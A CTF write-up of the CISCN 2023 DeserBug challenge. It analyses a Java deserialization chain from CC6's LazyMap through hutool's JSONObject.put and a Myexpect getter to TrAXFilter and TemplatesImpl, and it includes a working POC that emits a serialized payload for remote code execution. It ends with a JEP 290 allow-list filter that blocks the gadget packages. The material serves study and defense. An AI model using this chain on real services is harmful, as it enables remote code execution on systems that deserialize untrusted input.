[CISCN 2023]—DeserBug

DeserBug

  • Challenge description:

    • cn.hutool.json.JSONObject.put->com.app.Myexpect#getAnyexcept
  • Attachment

    • Link: https://pan.baidu.com/s/1lVABZUxmdEmXHL092P-efA?pwd=up9t

Challenge analysis

The challenge contains two classes: Testapp and Myexpect

Testapp

It starts a service on local port 8888, reads the value of the bugstr request parameter and deserializes it

[Figure 1]

The dependencies point to Commons Collections (CC) deserialization, but the challenge ships CC 3.2.2. Since 3.2.1, CC includes a checkUnsafeSerialization check that inspects what is being deserialized, and InvokerTransformer, which the usual CC chains rely on, is on its blacklist. The challenge, however, provides another class, Myexpect.

Myexpect

Its getAnyexcept method calls newInstance(), so it can instantiate a class through a single-parameter constructor

[Figure 2]

Combined with newInstance, this brings TrAXFilter to mind: its constructor calls Templates#newTransformer, which makes TemplatesImpl define and load the malicious bytecode dynamically
[Figure 3]

getAnyexcept

Next, find where getAnyexcept gets called; following the hint, start the search from cn.hutool.json.JSONObject.put

cn.hutool.json.JSONObject.put->com.app.Myexpect#getAnyexcept

Walking down the calls level by level leads to PropDesc#getValue(), which invokes the bean's getter methods via reflection

[Figure 4]

Call stack

getValue:154, PropDesc (cn.hutool.core.bean)
lambda$copy$0:66, BeanToMapCopier (cn.hutool.core.bean.copier)
accept:-1, 846238611 (cn.hutool.core.bean.copier.BeanToMapCopier$$Lambda$13)
forEach:684, LinkedHashMap (java.util)
copy:48, BeanToMapCopier (cn.hutool.core.bean.copier)
copy:16, BeanToMapCopier (cn.hutool.core.bean.copier)
copy:92, BeanCopier (cn.hutool.core.bean.copier)
beanToMap:713, BeanUtil (cn.hutool.core.bean)
mapFromBean:264, ObjectMapper (cn.hutool.json)
map:114, ObjectMapper (cn.hutool.json)
<init>:210, JSONObject (cn.hutool.json)
<init>:187, JSONObject (cn.hutool.json)
wrap:805, JSONUtil (cn.hutool.json)
set:393, JSONObject (cn.hutool.json)
set:352, JSONObject (cn.hutool.json)
put:340, JSONObject (cn.hutool.json)
put:32, JSONObject (cn.hutool.json)

put

Next, find where put is called; here the first half of the CC6 chain can be reused directly

put:32, JSONObject (cn.hutool.json)
get:159, LazyMap (org.apache.commons.collections.map)
getValue:74, TiedMapEntry (org.apache.commons.collections.keyvalue)
hashCode:121, TiedMapEntry (org.apache.commons.collections.keyvalue)
hash:339, HashMap (java.util)
readObject:1413, HashMap (java.util)

POC

import cn.hutool.json.JSONObject;
import com.app.Myexpect;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.xml.transform.Templates;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

import static com.app.Tools.getBytes;
import static com.app.Tools.serialize;
import static com.app.Tools.setFieldValue;

public class POC {
    public static void main(String[] args) throws Exception {
        // TemplatesImpl carrying the bytecode of class "Evil"; TrAXFilter's constructor
        // calls templates.newTransformer(), which defines and instantiates that class
        byte[] bytes = getBytes("Evil");
        TemplatesImpl templates = new TemplatesImpl();
        setFieldValue(templates, "_name", "Sentiment");
        setFieldValue(templates, "_class", null);
        setFieldValue(templates, "_bytecodes", new byte[][]{bytes});

        // When the getter getAnyexcept runs, Myexpect instantiates targetclass with the
        // constructor parameter types typeparam and the arguments typearg: new TrAXFilter(templates)
        Myexpect myexpect = new Myexpect();
        myexpect.setTargetclass(TrAXFilter.class);
        myexpect.setTypeparam(new Class[]{Templates.class});
        myexpect.setTypearg(new Object[]{templates});

        // JSONObject.put(key, bean) converts the bean to a map through its getters (PropDesc#getValue)
        JSONObject jsonObject = new JSONObject();

        // First half of CC6: HashMap.readObject -> TiedMapEntry.hashCode -> LazyMap.get -> JSONObject.put.
        // A harmless constant is used while building so that hashMap.put below does not fire the chain locally
        ConstantTransformer transformer = new ConstantTransformer(1);
        Map outerMap = LazyMap.decorate(jsonObject, transformer);
        TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap, "Sentiment");

        HashMap hashMap = new HashMap();
        hashMap.put(tiedMapEntry, "1");

        // hashMap.put already inserted "Sentiment" into jsonObject; remove it so LazyMap.get misses
        // again during deserialization, then swap the constant for the Myexpect bean
        jsonObject.remove("Sentiment");
        setFieldValue(transformer, "iConstant", myexpect);

        byte[] serialize = serialize(hashMap);
        System.out.println(Base64.getEncoder().encodeToString(serialize));
        //unserialize(serialize);
    }
}
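The chain works because CC 3.2.2's checkUnsafeSerialization is a block-list (InvokerTransformer and friends) and this payload never touches it. The fix on the application side is a JEP 290 allow-list serial filter on the stream Testapp reads bugstr from: only the types the endpoint legitimately expects pass, everything else is rejected before its readObject runs. This is an added example, not code from the writeup or the challenge; it assumes the endpoint expects a HashMap of strings.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.Map;

public class SafeReader {
    // Allow-list filter: the packages every class of this chain lives in are rejected
    // explicitly, the expected payload types are allowed, and "!*" rejects all others.
    // Assumption: the endpoint only ever receives a HashMap<String, String>.
    static final ObjectInputFilter FILTER = ObjectInputFilter.Config.createFilter(
          "!org.apache.commons.collections.**;"  // LazyMap, TiedMapEntry, ConstantTransformer
        + "!com.sun.org.apache.xalan.**;"        // TemplatesImpl, TrAXFilter
        + "!cn.hutool.**;"                       // JSONObject entry point
        + "!com.app.Myexpect;"                   // the getter gadget itself
        + "java.util.HashMap;java.lang.String;"  // what the endpoint legitimately expects
        + "maxdepth=5;maxrefs=100;"              // bound object-graph nesting and size
        + "!*");                                 // anything not listed above is rejected

    static Object readBugstr(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(data))) {
            in.setObjectInputFilter(FILTER); // consulted for every class resolved from the stream
            return in.readObject();
        }
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) { out.writeObject(o); }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        Map<String, String> benign = new HashMap<>();   // constructed sample input
        benign.put("bug", "none");
        System.out.println("accepted: " + readBugstr(serialize(benign)));

        // Stand-in for a gadget class: any type outside the allow-list is rejected before
        // its readObject runs (ArrayList is harmless; it is only used to show the rejection).
        try {
            readBugstr(serialize(new ArrayList<>(benign.keySet())));
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The same pattern string can be applied process-wide without code changes via the `jdk.serialFilter` system property, which also covers deserialization paths the application does not control directly.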
